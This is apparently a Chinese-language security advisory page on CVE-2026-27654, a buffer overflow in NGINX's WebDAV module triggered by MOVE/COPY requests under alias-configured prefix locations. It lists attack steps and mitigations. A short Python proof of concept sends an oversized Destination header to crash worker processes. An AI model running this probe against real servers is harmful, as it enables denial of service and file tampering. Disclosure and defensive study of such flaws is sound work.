CVE-2026-27654 CVSS 8.2 高危

CVE-2026-27654 NGINX DAV模块缓冲区溢出漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27654

漏洞类型

缓冲区溢出

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NGINX Open Source, NGINX Plus

漏洞概述

NGINX开源版及NGINX Plus的ngx_http_dav_module模块存在安全漏洞。当配置文件中使用了DAV模块的MOVE或COPY方法，并结合前缀位置（非正则表达式配置）和alias指令时，远程攻击者可触发缓冲区溢出。此漏洞可能导致NGINX工作进程崩溃，或导致文档根目录之外的源或目标文件名被修改。尽管Worker进程权限较低限制了影响范围，但该漏洞仍构成高危风险。

技术细节

该漏洞源于ngx_http_dav_module在处理WebDAV请求时的逻辑错误。具体触发条件是服务器配置必须同时满足三个要素：启用DAV的MOVE或COPY方法、使用非正则表达式的前缀location、以及在该location下使用alias指令。在此配置下，攻击者可发送特制的HTTP请求，导致模块在处理路径时发生缓冲区溢出。利用该漏洞，攻击者可能造成拒绝服务攻击，使工作进程终止；或者在特定条件下覆盖内存数据，进而修改超出文档根目录范围的文件路径，破坏文件系统完整性。由于NGINX工作进程通常以非特权用户运行，系统级的完全控制风险较低，但数据篡改风险显著。

攻击链分析

STEP 1

信息收集

攻击者识别目标服务器运行NGINX，并探测是否启用了WebDAV模块（MOVE/COPY方法支持）以及具体的location配置结构。

STEP 2

漏洞探测

攻击者向配置了alias指令的前缀location发送特制的MOVE或COPY请求，测试是否存在路径处理异常。

STEP 3

漏洞利用

攻击者发送包含超长路径或特定格式参数的恶意请求，触发ngx_http_dav_module的缓冲区溢出。

STEP 4

达成效果

导致NGINX工作进程崩溃（DoS），或利用溢出修改内存数据，进而重命名或移动文档根目录外的文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-27654 PoC Example
# This script attempts to trigger the buffer overflow in ngx_http_dav_module
# Requires target to be configured with DAV MOVE/COPY, prefix location, and alias.

target_url = "http://example.com/vulnerable_path/"

# Malicious headers designed to trigger overflow in MOVE/COPY processing
headers = {
    "Destination": target_url + "A" * 5000  # Long path to trigger overflow
}

try:
    # Sending a MOVE request which may trigger the vulnerability
    response = requests.request("MOVE", target_url + "testfile.txt", headers=headers)
    print(f"Status Code: {response.status_code}")
    print(f"Response Headers: {response.headers}")
    if response.status_code == 500 or response.status_code == 400:
        print("Potential crash or error detected.")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

NGINX Open Source

NGINX Plus

防御指南

临时缓解措施

建议立即检查NGINX配置文件，确认是否启用了WebDAV模块（dav_methods指令）并结合了alias指令。如果是，请暂时禁用WebDAV功能或调整配置结构，例如使用root指令替代alias，或使用正则表达式匹配location，直至应用官方补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-27654
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-27654
3 Details https://www.cvedetails.com/cve/CVE-2026-27654/
4 VulDB https://vuldb.com/cve/CVE-2026-27654
5 Link https://my.f5.com/manage/s/article/K000160382

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表